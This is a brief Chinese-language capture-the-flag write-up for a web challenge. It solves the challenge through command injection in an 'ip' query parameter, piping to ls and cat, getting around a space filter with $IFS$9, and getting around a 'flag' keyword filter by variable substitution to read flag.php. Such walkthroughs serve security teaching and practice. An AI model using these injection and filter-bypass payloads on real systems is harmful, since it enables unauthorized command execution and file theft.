打开页面如下:
按提示输入ip 127.0.0.1
尝试加管道符,查看目录结构,?ip=127.0.0.1|ls
cat查看flag.php
他骂我们,说空格不行。使用其他字符替换空格,?ip=127.0.0.1|cat$IFS$9flag.php
又骂我们,说flag字符串不行,我们先看看index.php,直接审计代码看看怎么绕过,?ip=127.0.0.1|cat$IFS$9index.php
发现这一行会匹配flag四个字符是否按顺序依次出现过。这时我们可以使用变量替换,?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php
查看网页源码发现flag
